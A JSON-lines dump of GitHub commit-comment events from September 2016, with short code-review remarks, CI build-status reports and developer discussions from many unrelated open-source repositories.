{"id":"4524933723","type":"CommitCommentEvent","actor":{"login":"linmufeng"},"repo":{"name":"linmufeng/linmufeng.github.io"},"payload":{"comment":{"id":18921877,"position":null,"line":null,"path":null,"commit_id":"4ed6fd8557e3c999d615732550f8a8f6689872ea","created_at":"2016-09-07T01:39:24Z","updated_at":"2016-09-07T01:39:24Z","body":"您好，不是很清楚您所表达的意思，这上面信息并不能及时看到并回复，如果有需要，请给我发邮件：hejinlong163***163.com(***是@)"}},"created_at":"2016-09-07T01:39:24Z"}
{"id":"4524935014","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18921880,"position":null,"line":null,"path":null,"commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T01:39:52Z","updated_at":"2016-09-07T01:39:52Z","body":"I'm a bit tired (it's 3am here 😴). Could you maybe just tell me which API is working? I'm trying every API right now and many don't seem to be working anymore.\r\n\r\nYou can follow my current progress here: https://github.com/KenanSulayman/sysdig-node/issues/1.\r\n\r\nI'll add a README when I'm done with the basic API, just as a mitigation against Google indexing the repo beforehand."}},"created_at":"2016-09-07T01:39:52Z"}
{"id":"4524935512","type":"CommitCommentEvent","actor":{"login":"spectre-php"},"repo":{"name":"spectre-php/weiphp"},"payload":{"comment":{"id":18921883,"position":1,"line":1,"path":"README.md","commit_id":"a1f15db9dcc8655c1ac867062c4caf9d615c851d","created_at":"2016-09-07T01:40:03Z","updated_at":"2016-09-07T01:40:03Z","body":"\r\nMYSQL优化\r\n\r\n"}},"created_at":"2016-09-07T01:40:03Z"}
{"id":"4524935744","type":"CommitCommentEvent","actor":{"login":"spectre-php"},"repo":{"name":"spectre-php/weiphp"},"payload":{"comment":{"id":18921885,"position":1,"line":1,"path":"README.md","commit_id":"a1f15db9dcc8655c1ac867062c4caf9d615c851d","created_at":"2016-09-07T01:40:11Z","updated_at":"2016-09-07T01:40:11Z","body":"\r\nMYSQL优化\r\n\r\n"}},"created_at":"2016-09-07T01:40:11Z"}
{"id":"4524938395","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18921888,"position":null,"line":null,"path":null,"commit_id":"148e29cfaf7f976a5d7fee79c363273d6edce2ff","created_at":"2016-09-07T01:41:03Z","updated_at":"2016-09-07T01:41:03Z","body":"os_2_0_develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-148e29cfaf7f976a5d7fee79c363273d6edce2ff-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-148e29cfaf7f976a5d7fee79c363273d6edce2ff-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T01:41:03Z"}
{"id":"4524943585","type":"CommitCommentEvent","actor":{"login":"aichholzer"},"repo":{"name":"sindresorhus/boxen"},"payload":{"comment":{"id":18921901,"position":null,"line":null,"path":null,"commit_id":"d7a92e39f29ba41378c4dba83ad8dd67b3f553d5","created_at":"2016-09-07T01:42:55Z","updated_at":"2016-09-07T01:42:55Z","body":"@sindresorhus You beat me to it! 🚀 \r\nI had actually started `ES2051-fying` my fork and was planning to submit a pull-request later today. Let me know if you need any help and I can continue from where you left it."}},"created_at":"2016-09-07T01:42:55Z"}
{"id":"4524945156","type":"CommitCommentEvent","actor":{"login":"GitHubOfWK"},"repo":{"name":"GitHubOfWK/helloworld"},"payload":{"comment":{"id":18921903,"position":1,"line":1,"path":"README.md","commit_id":"237977d5f64833ca70c0436bee15387b37ef3a15","created_at":"2016-09-07T01:43:29Z","updated_at":"2016-09-07T01:43:29Z","body":"start"}},"created_at":"2016-09-07T01:43:29Z"}
{"id":"4524949577","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"simonster/Reexport.jl"},"payload":{"comment":{"id":18921910,"position":null,"line":null,"path":null,"commit_id":"504e5924bcc631ad390ac639d2c70cc196258693","created_at":"2016-09-07T01:45:09Z","updated_at":"2016-09-07T01:45:09Z","body":"haha wow. before making another tag you'll also have to drop 0.3"}},"created_at":"2016-09-07T01:45:09Z"}
{"id":"4524954804","type":"CommitCommentEvent","actor":{"login":"dengmao641"},"repo":{"name":"dengmao641/liuyue"},"payload":{"comment":{"id":18921920,"position":133,"line":133,"path":"真龙考研专题/index.html","commit_id":"c8385e1b4c5d84bd526abac24f3e99878aa6e2ae","created_at":"2016-09-07T01:46:59Z","updated_at":"2016-09-07T01:46:59Z","body":"div"}},"created_at":"2016-09-07T01:46:59Z"}
{"id":"4524956385","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18921922,"position":94,"line":118,"path":"components/family-studies/api/src/main/java/org/phenotips/studies/family/listener/FamilyDeletingListener.java","commit_id":"bf592492e7e58e0ac9cc9f45e7a886d96a46be68","created_at":"2016-09-07T01:47:32Z","updated_at":"2016-09-07T01:47:32Z","body":"Since you're not saving the document, this change will be discarded. You need to call `xwiki.saveDocument(familyDocument, \"Proband was deleted\", true, context)`."}},"created_at":"2016-09-07T01:47:32Z"}
{"id":"4524957960","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18921924,"position":101,"line":125,"path":"components/family-studies/api/src/main/java/org/phenotips/studies/family/listener/FamilyDeletingListener.java","commit_id":"bf592492e7e58e0ac9cc9f45e7a886d96a46be68","created_at":"2016-09-07T01:48:08Z","updated_at":"2016-09-07T01:48:08Z","body":"Save needed here as well."}},"created_at":"2016-09-07T01:48:08Z"}
{"id":"4524958081","type":"CommitCommentEvent","actor":{"login":"Nicerova7"},"repo":{"name":"Nicerova7/ParallelAlgorithmsCSUNI"},"payload":{"comment":{"id":18921925,"position":null,"line":null,"path":null,"commit_id":"fbb75c9d44e4b181abb8ac944b80ea9cc99106a5","created_at":"2016-09-07T01:48:10Z","updated_at":"2016-09-07T01:48:10Z","body":"gg pes !"}},"created_at":"2016-09-07T01:48:10Z"}
{"id":"4524959798","type":"CommitCommentEvent","actor":{"login":"Ozymandias81"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18921927,"position":null,"line":null,"path":null,"commit_id":"9ee8de17bd3cbad6f01d3bcd7036d7f20c4e594c","created_at":"2016-09-07T01:48:48Z","updated_at":"2016-09-07T01:48:48Z","body":"Ok, [it seems that I get it](https://github.com/Realm667/WolfenDoom/commit/4dda8b8d5469247ad10ed263eb61618cbe2e497b)... Also I think that these changes are free from glitches if we stay within the chosen range (2768)."}},"created_at":"2016-09-07T01:48:48Z"}
{"id":"4524961037","type":"CommitCommentEvent","actor":{"login":"compressed"},"repo":{"name":"ChrisMacNaughton/vault-rs"},"payload":{"comment":{"id":18921930,"position":null,"line":null,"path":null,"commit_id":"99d76dd025351b8863ae6b06bd47f28fa25d0e0c","created_at":"2016-09-07T01:49:15Z","updated_at":"2016-09-07T01:49:15Z","body":"thanks!"}},"created_at":"2016-09-07T01:49:15Z"}
{"id":"4524966539","type":"CommitCommentEvent","actor":{"login":"rezn5447"},"repo":{"name":"rezn5447/RubyPrep"},"payload":{"comment":{"id":18921939,"position":null,"line":null,"path":null,"commit_id":"af98c8599c7cbd8153ad511ee75e305ba38711de","created_at":"2016-09-07T01:51:18Z","updated_at":"2016-09-07T01:51:18Z","body":"👍    😐   :neckbeard:  "}},"created_at":"2016-09-07T01:51:18Z"}
{"id":"4524967513","type":"CommitCommentEvent","actor":{"login":"belackriv"},"repo":{"name":"belackriv/plugin-hbs"},"payload":{"comment":{"id":18921940,"position":null,"line":null,"path":null,"commit_id":"5eaf20996055f908561d32dbc7e453d43573eaff","created_at":"2016-09-07T01:51:42Z","updated_at":"2016-09-07T01:51:42Z","body":"for whatever reason, when I bundle with jspm .17, it would change it to to local path, like 'C:\\Users\\belac\\Documents\\Code\\...' and try to load that path in the browser.  This was my lazy \"fix\"."}},"created_at":"2016-09-07T01:51:42Z"}
{"id":"4524968466","type":"CommitCommentEvent","actor":{"login":"PhantonQuad"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18921943,"position":null,"line":null,"path":null,"commit_id":"d5d6d10c92103cd0535d71cb06b73c66c1de361d","created_at":"2016-09-07T01:52:03Z","updated_at":"2016-09-07T01:52:03Z","body":"Thank you"}},"created_at":"2016-09-07T01:52:03Z"}
{"id":"4524969105","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18921944,"position":26,"line":48,"path":"components/family-studies/api/src/main/java/org/phenotips/studies/family/listener/FamilyDeletingListener.java","commit_id":"bf592492e7e58e0ac9cc9f45e7a886d96a46be68","created_at":"2016-09-07T01:52:18Z","updated_at":"2016-09-07T01:52:18Z","body":"Too much functionality in one class, better split it in two, one for deleted families, and one for deleted patients."}},"created_at":"2016-09-07T01:52:18Z"}
{"id":"4524970413","type":"CommitCommentEvent","actor":{"login":"boatmon0"},"repo":{"name":"crystal-lang/crystal-sqlite3"},"payload":{"comment":{"id":18921950,"position":null,"line":null,"path":null,"commit_id":"0396d637716428c066c9a7b7a413a0b31b635f71","created_at":"2016-09-07T01:52:46Z","updated_at":"2016-09-07T01:52:46Z","body":"What am I doing wrong?  After the update to the new version of crystal, I updated the shard to require this new version.  I must have left out some important step.  My code was working before the upgrade.   I get an error:\r\n\r\nwhile requiring \"sqlite3\"\r\n\r\nrequire \"sqlite3\"\r\n^\r\n\r\nin ./libs/sqlite3/sqlite3.cr:2: while requiring \"./sqlite3/**\"\r\n\r\nrequire \"./sqlite3/**\"\r\n^\r\n\r\nin ./libs/sqlite3/sqlite3/lib_sqlite3.cr:18: fun redefinition with different signature (was `fun open = sqlite3_open_v2(filename : ::Pointer(UInt8), db : ::Pointer(SQLite3)) : Int32` at /home/eugene/workspace/harvest/libs/sqlite3/sqlite3/lib_sqlite3.cr:17:3)\r\n\r\n  fun open_v2 = sqlite3_open_v2(filename : UInt8*, db : SQLite3*, flags : ::SQLite3::Flag, zVfs : UInt8*) : Int32\r\n  ^\r\n"}},"created_at":"2016-09-07T01:52:46Z"}
{"id":"4524974484","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18921957,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-07T01:54:22Z","updated_at":"2016-09-07T01:54:22Z","body":"@snicolet your inputs are welcome :) I will fix it for LTC if test passes STC."}},"created_at":"2016-09-07T01:54:22Z"}
{"id":"4524975422","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18921959,"position":92,"line":116,"path":"components/family-studies/api/src/main/java/org/phenotips/studies/family/listener/FamilyDeletingListener.java","commit_id":"bf592492e7e58e0ac9cc9f45e7a886d96a46be68","created_at":"2016-09-07T01:54:41Z","updated_at":"2016-09-07T01:54:41Z","body":"Actually this code seems to be doing too much unneeded work. If the proband doesn't change, there's no need to re-set the field every time a patient is deleted. Why not simply clear the proband field if and only if the deleted patient was indeed the proband?"}},"created_at":"2016-09-07T01:54:41Z"}
{"id":"4524975626","type":"CommitCommentEvent","actor":{"login":"bhajer3"},"repo":{"name":"medseek-engineering/ccs-model-predictions"},"payload":{"comment":{"id":18921960,"position":18,"line":40,"path":"src/main/python/helper.py","commit_id":"2357947dcbe7b70ecfbb5e7592818a5f8c89fa9b","created_at":"2016-09-07T01:54:47Z","updated_at":"2016-09-07T01:54:47Z","body":"since you did, df['division'] = df['division'].astype('str'), you do not need the if df[columnName].dtypes == object in here. Im guessing division was stored in BQ as a integer and this was breaking (.replace only defined for strings), but u already cast the column to string above, so not necessary. "}},"created_at":"2016-09-07T01:54:47Z"}
{"id":"4524976469","type":"CommitCommentEvent","actor":{"login":"jcredding"},"repo":{"name":"redding/mr"},"payload":{"comment":{"id":18921962,"position":null,"line":null,"path":null,"commit_id":"add2fa1aa7c02aee3fdfe8efc5504857e8c2270e","created_at":"2016-09-07T01:55:08Z","updated_at":"2016-09-07T01:55:08Z","body":"/cc @kellyredding "}},"created_at":"2016-09-07T01:55:08Z"}
{"id":"4524976855","type":"CommitCommentEvent","actor":{"login":"AFADoomer"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18921963,"position":null,"line":null,"path":null,"commit_id":"9ee8de17bd3cbad6f01d3bcd7036d7f20c4e594c","created_at":"2016-09-07T01:55:16Z","updated_at":"2016-09-07T01:55:16Z","body":"Great work!  I'll tweak what you have there a little, if you don't mind...\nThere's no need to duplicate all of the code for 'don't cast' (since it\nwon't work anyway if there's no glow actor spawned....  using \"if\n(CountProximity(\"PlayerPawn\", 2768.0, CPXF_ANCESTOR))\" in place of the\nnot-useful increment code should be equivalent...\n\nOn Tue, Sep 6, 2016 at 8:48 PM, Ozymandias81 <notifications@github.com>\nwrote:\n\n> Ok, it seems that I get it\n> <https://github.com/Realm667/WolfenDoom/commit/4dda8b8d5469247ad10ed263eb61618cbe2e497b>...\n> Also I think that these changes are free from glitches if we stay within\n> the chosen range (2768).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Realm667/WolfenDoom/commit/9ee8de17bd3cbad6f01d3bcd7036d7f20c4e594c#commitcomment-18921927>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AP2VRKEeeAsYmRsDttrNLTnBZ6r-n9iEks5qnhgBgaJpZM4J2cUf>\n> .\n>\n"}},"created_at":"2016-09-07T01:55:16Z"}
{"id":"4524977535","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18921964,"position":null,"line":null,"path":null,"commit_id":"e9249abc83f4b2ba0182ac3150115eccb5873461","created_at":"2016-09-07T01:55:31Z","updated_at":"2016-09-07T01:55:31Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-07T01:55:31Z"}
{"id":"4524978615","type":"CommitCommentEvent","actor":{"login":"huacnlee"},"repo":{"name":"wuxsoft/myblog"},"payload":{"comment":{"id":18921967,"position":5,"line":5,"path":"app/views/articles/detail/_case.html.erb","commit_id":"0e0bc8b9a7daada20e1776ec959822f52fd308cf","created_at":"2016-09-07T01:55:55Z","updated_at":"2016-09-07T01:55:55Z","body":"articles_path(case_id: detail.id)"}},"created_at":"2016-09-07T01:55:55Z"}
{"id":"4524978691","type":"CommitCommentEvent","actor":{"login":"bhajer3"},"repo":{"name":"medseek-engineering/ccs-model-predictions"},"payload":{"comment":{"id":18921968,"position":10,"line":33,"path":"src/main/python/prediction.py","commit_id":"2357947dcbe7b70ecfbb5e7592818a5f8c89fa9b","created_at":"2016-09-07T01:55:56Z","updated_at":"2016-09-07T01:55:56Z","body":"nice optimization! "}},"created_at":"2016-09-07T01:55:56Z"}
{"id":"4524979378","type":"CommitCommentEvent","actor":{"login":"anntzer"},"repo":{"name":"Calysto/metakernel"},"payload":{"comment":{"id":18921970,"position":34,"line":274,"path":"metakernel/parser.py","commit_id":"cc4111135806c6af58c2604e16bcc84f65707184","created_at":"2016-09-07T01:56:13Z","updated_at":"2016-09-07T01:56:13Z","body":"@blink1073 why do you drop out paths with spaces here?"}},"created_at":"2016-09-07T01:56:13Z"}
{"id":"4524982737","type":"CommitCommentEvent","actor":{"login":"bhajer3"},"repo":{"name":"medseek-engineering/ccs-model-predictions"},"payload":{"comment":{"id":18921979,"position":5,"line":10,"path":"src/main/python/helper.py","commit_id":"2357947dcbe7b70ecfbb5e7592818a5f8c89fa9b","created_at":"2016-09-07T01:57:30Z","updated_at":"2016-09-07T01:57:30Z","body":"how about \"%m_%d_%y_%H:%M:%S\" "}},"created_at":"2016-09-07T01:57:30Z"}
{"id":"4524983314","type":"CommitCommentEvent","actor":{"login":"Lewis-Kang"},"repo":{"name":"opencomputeproject/OpenNetworkLinux"},"payload":{"comment":{"id":18921982,"position":null,"line":null,"path":null,"commit_id":"7714680845663d2990762a8883aa4527514002f6","created_at":"2016-09-07T01:57:43Z","updated_at":"2016-09-07T01:57:43Z","body":"Hi Jeff,\r\n\r\nGot duplication as below. Thanks.\r\n\r\nroot@localhost:/etc/onl# tail ../dhcp/dhclient.conf\r\n#  renew 2 2000/1/12 00:00:01;\r\n#  rebind 2 2000/1/12 00:00:01;\r\n#  expire 2 2000/1/12 00:00:01;\r\n#}\r\ninterface \"ma1\" {\r\n    send dhcp-client-identifier 01:70:72:cf:a7:02:08;\r\n}\r\ninterface \"ma1\" {\r\n    send dhcp-client-identifier 01:70:72:cf:a7:02:08;\r\n}\r\nroot@localhost:/etc/onl# cat SWI\r\nimages:ONL-2.0.0_ONL-OS_2016-09-04.1726-3f30495_PPC.swi\r\n"}},"created_at":"2016-09-07T01:57:43Z"}
{"id":"4524985659","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18921989,"position":null,"line":null,"path":null,"commit_id":"148e29cfaf7f976a5d7fee79c363273d6edce2ff","created_at":"2016-09-07T01:58:38Z","updated_at":"2016-09-07T01:58:38Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-148e29cfaf7f976a5d7fee79c363273d6edce2ff-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-148e29cfaf7f976a5d7fee79c363273d6edce2ff-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T01:58:38Z"}
{"id":"4524985755","type":"CommitCommentEvent","actor":{"login":"BohuTANG"},"repo":{"name":"BohuTANG/percona-xtrabackup"},"payload":{"comment":{"id":18921990,"position":null,"line":null,"path":null,"commit_id":"b43ba1b25deff2ba21eb9030b49413e1851f263b","created_at":"2016-09-07T01:58:40Z","updated_at":"2016-09-07T01:58:40Z","body":"@zhangzaki \r\nAgain, you should port this patch to your MariaDB, it's not a step issue.\r\nhttps://github.com/BohuTANG/ft-index/commit/e48ac39c6644114c674f600dbdc4b34788e47091"}},"created_at":"2016-09-07T01:58:40Z"}
{"id":"4524989220","type":"CommitCommentEvent","actor":{"login":"asaph"},"repo":{"name":"careercup/CtCI-6th-Edition-php"},"payload":{"comment":{"id":18921996,"position":17,"line":17,"path":"src/chapter16/question16.04/TicTacToe.php","commit_id":"1d4844f05d5aa179579f86155668d10b60c9ed04","created_at":"2016-09-07T01:59:57Z","updated_at":"2016-09-07T01:59:57Z","body":"Good suggestion @reywood. I addressed this issue in a41be2ab740c2b24c87ba79afec1087b936dc797. Thank you."}},"created_at":"2016-09-07T01:59:57Z"}
{"id":"4526623028","type":"CommitCommentEvent","actor":{"login":"Fastjur"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":18925891,"position":35,"line":34,"path":"src/main/java/net/liquidpineapple/pang/objects/ball.java","commit_id":"46f5631ee4c0ee4f496c3f40c8fcd02a5efbf098","created_at":"2016-09-07T10:00:14Z","updated_at":"2016-09-07T10:00:14Z","body":"String comparison using `==` is incorrect. Use the [String.equals](https://docs.oracle.com/javase/7/docs/api/java/lang/String.html#equals(java.lang.Object)) method for this"}},"created_at":"2016-09-07T10:00:14Z"}
{"id":"4526624445","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"vshaxe/haxe-languageserver"},"payload":{"comment":{"id":18925895,"position":null,"line":null,"path":null,"commit_id":"ba566b587d15214fc45aaa2137544f7644213b53","created_at":"2016-09-07T10:00:28Z","updated_at":"2016-09-07T10:00:28Z","body":"How does this work exactly? I guess I need to add `\"--times\"` to `\"haxe.displayServer.arguments\"` or something like that?"}},"created_at":"2016-09-07T10:00:28Z"}
{"id":"4526636160","type":"CommitCommentEvent","actor":{"login":"jerone"},"repo":{"name":"cakecatz/flex-toolbar"},"payload":{"comment":{"id":18925928,"position":14,"line":195,"path":"lib/flex-tool-bar.coffee","commit_id":"e08b6d118a5ddc28fe8c91864d4d0055ae2bd9ca","created_at":"2016-09-07T10:02:34Z","updated_at":"2016-09-07T10:02:34Z","body":"We're running on Chrome engine; `classList` is always available."}},"created_at":"2016-09-07T10:02:34Z"}
{"id":"4526636430","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18925929,"position":13,"line":120,"path":"ChickenAdventure/Assets/Scripts/Player.cs","commit_id":"e641f19fff053ef4f801cb316b23aae63e718d39","created_at":"2016-09-07T10:02:38Z","updated_at":"2016-09-07T10:02:38Z","body":":warning: [`as`](https://msdn.microsoft.com/en-us/library/cscsdfbt.aspx) peut retourner `null`."}},"created_at":"2016-09-07T10:02:38Z"}
{"id":"4526637205","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925932,"position":null,"line":null,"path":null,"commit_id":"5c41baad082fdf204ef7d00a01689ccece1c87dc","created_at":"2016-09-07T10:02:47Z","updated_at":"2016-09-07T10:02:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 948](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12835&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:52"}},"created_at":"2016-09-07T10:02:47Z"}
{"id":"4526637221","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925933,"position":null,"line":null,"path":null,"commit_id":"4ed46a5dc2dbe1f917610e94ff2ae8d4527c57a6","created_at":"2016-09-07T10:02:47Z","updated_at":"2016-09-07T10:02:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 950](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12841&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T10:02:47Z"}
{"id":"4526638136","type":"CommitCommentEvent","actor":{"login":"fritx"},"repo":{"name":"funkyLover/posts"},"payload":{"comment":{"id":18925936,"position":null,"line":null,"path":null,"commit_id":"4be845ea8c915589ac112341c058d0180ff9f18f","created_at":"2016-09-07T10:02:57Z","updated_at":"2016-09-07T10:02:57Z","body":"6啊，我们做IM也碰到与你这个相似的。\r\n也是用的file-type，不过不像你用到了前端环境。。666\r\n"}},"created_at":"2016-09-07T10:02:57Z"}
{"id":"4526640114","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925941,"position":null,"line":null,"path":null,"commit_id":"63c4c0469a30c9429aabe5edd32e107d6c85456e","created_at":"2016-09-07T10:03:20Z","updated_at":"2016-09-07T10:03:20Z","body":"Yes, single quotes here.\r\n\r\nThe Groovy community has no agreement on quotes :smile: My rationale is simple: if I want to embed an expression in the string, I can do so with double quotes. With single quotes, I would also have to change the quotes themselves. I also like the consistency with Java.\r\n\r\nThe two main arguments for single quotes are:\r\n\r\n - less noisy\r\n - a historic performance reason that hasn't applied since 1.something\r\n\r\nThe first of these is why I like to use single quotes in map keys.\r\n\r\nI'm OK with the single-quote approach for non-expanded strings if that's what people prefer. Just need to be consistent."}},"created_at":"2016-09-07T10:03:20Z"}
{"id":"4526643977","type":"CommitCommentEvent","actor":{"login":"ben-eb"},"repo":{"name":"ben-eb/css-values"},"payload":{"comment":{"id":18925953,"position":65,"line":54,"path":"src/validators/isBasicShape.js","commit_id":"16f59116fa8496ae4693bfc11def8c208682f869","created_at":"2016-09-07T10:04:05Z","updated_at":"2016-09-07T10:04:05Z","body":"Since https://github.com/ben-eb/css-values/commit/fa35553d75a599fe656805e89f4554eeefe73a25 you can use `isAt(child)` instead here. 😄 "}},"created_at":"2016-09-07T10:04:05Z"}
{"id":"4526644166","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925954,"position":5,"line":27,"path":"build.gradle","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T10:04:08Z","updated_at":"2016-09-07T10:04:08Z","body":"This is quite intentional, basically forcing us to have this conversation.\r\n\r\nMuch like we've decided to call the User Guide the \"User Manual\", I want to discuss whether we want to continue referring to the \"DSL guide\" as such, or rather, call it the \"Language Reference\", which is actually what the DSL guide calls itself in its own title:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/301810/18307726/efac29dc-74f1-11e6-925d-f7a668c609b5.png)\r\n\r\nThis is a much larger conversation, but I believe that continuing to refer to Gradle's \"DSL\" as such is increasingly a liability, because DSL is an acronym we should not assume everybody understands. If you were active in the enterprise software development world circa 2008, you probably have a strong understanding of what DSL means, and probably have a more or less intuitive sense of why Gradle refers to its scripting frontend as a DSL. If you're a 21-year old Android developer, however, \"DSL\" is probably just one more irritating barrier to understand wtf Gradle is and how to deal with it. Likewise for folks in any of the other non-JVM, non-enterprise, non-Martin-Fowler-buzzword-aware ecosystems Gradle addresses currently or wants to address in the future.\r\n\r\nSo again we use the guides as a forcing function here. What happens if we consistently refer to the \"Language Reference\" in these guides (which, again, is not something we're making up—that verbiage is already front-and-center H1 in the doc itself)? This may be a way to force the conversation about how we want to refer to this resource at large in the future, and more to the point, it may help us define what exactly the role of the DSL / Language Reference _should be_ going forward. Personally, I spend very little time in that resource. I have had high hopes for it many times, and those hopes have almost always been dashed by the same poverty of examples that you are concerned about above."}},"created_at":"2016-09-07T10:04:08Z"}
{"id":"4526652890","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18925974,"position":62,"line":86,"path":"lesson_9/modules.rb","commit_id":"815585c3b1d501e2089fff5f1eca2c8c0e642331","created_at":"2016-09-07T10:05:51Z","updated_at":"2016-09-07T10:05:51Z","body":"Здесь ты используешь инстанс-переменную, а правила сохранены в инстанс-переменной **уровня класса**, т.е. несмотря на одинаковое название, это **две разные переменные**. Чтобы обратиться к переменной уровня класса тебе нужен геттер уровня класса: `self.class.validate_rules`"}},"created_at":"2016-09-07T10:05:51Z"}
{"id":"4526653368","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925976,"position":null,"line":null,"path":null,"commit_id":"6bd8d9f27e992ab44a3d6eb8e195b9316113dd38","created_at":"2016-09-07T10:05:57Z","updated_at":"2016-09-07T10:05:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 949](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12838&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 213, ignored: 3 Build time: 00:07:56\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T10:05:57Z"}
{"id":"4526657976","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925987,"position":5,"line":27,"path":"build.gradle","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T10:06:50Z","updated_at":"2016-09-07T10:06:50Z","body":"And in any case, what to call the DSL / Language Reference is one for the style guide, so explicitly mentioning it here so as to create a \"reminder\" in the activity feed for gradle/build-tool-web#92."}},"created_at":"2016-09-07T10:06:50Z"}
